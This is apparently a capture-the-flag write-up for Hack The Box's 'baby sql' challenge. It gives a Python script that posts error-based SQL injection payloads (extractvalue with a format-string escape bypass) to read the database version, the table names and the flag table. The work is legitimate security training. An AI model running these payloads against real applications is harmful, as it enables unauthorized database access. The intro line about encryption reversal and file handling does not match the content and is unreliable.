HackTheBox baby sql Challenge
Explore the basics of cybersecurity in the baby sql Challenge on Hack The Box. This medium-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
https://app.hackthebox.com/challenges/146
Description
I heard that *real_escape_string() functions protect you from malicious user input inside SQL statements, I hope you can’t prove me wrong…
Exploitation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#!/usr/bin/env python3
import requests
import sys
def send_post_request(url, data):
return requests.post(url, data=data)
if len(sys.argv) != 2:
print(f"Usage: python {sys.argv[0]} <ip:port>")
sys.exit(1)
host, port = sys.argv[1].split(':')
HOST = f'http://{host}:{port}/'
payloads = [
{'pass': "%1$')||extractvalue(null,concat(0x7e, version()));#"},
{'pass': "%1$')||extractvalue(null,concat(0x7e,(select group_concat(table_name) from information_schema.tables WHERE table_schema=database())));#"},
{'pass': "%1$')||extractvalue(null,concat(0x7e,(select * from totally_not_a_flag)));#"}
]
for payload in payloads:
print(send_post_request(HOST, payload).text)
Summary
The baby sql Challenge on Hack The Box is a medium-level web challenge that involves exploiting improper input sanitization in SQL queries. Participants leverage SQL injection through improper use of real_escape_string(), using XPath error-based injection via extractvalue() to extract database information and retrieve the flag. The challenge highlights the risks of incomplete input validation, emphasizing the importance of proper parameterized queries to prevent SQL injection vulnerabilities.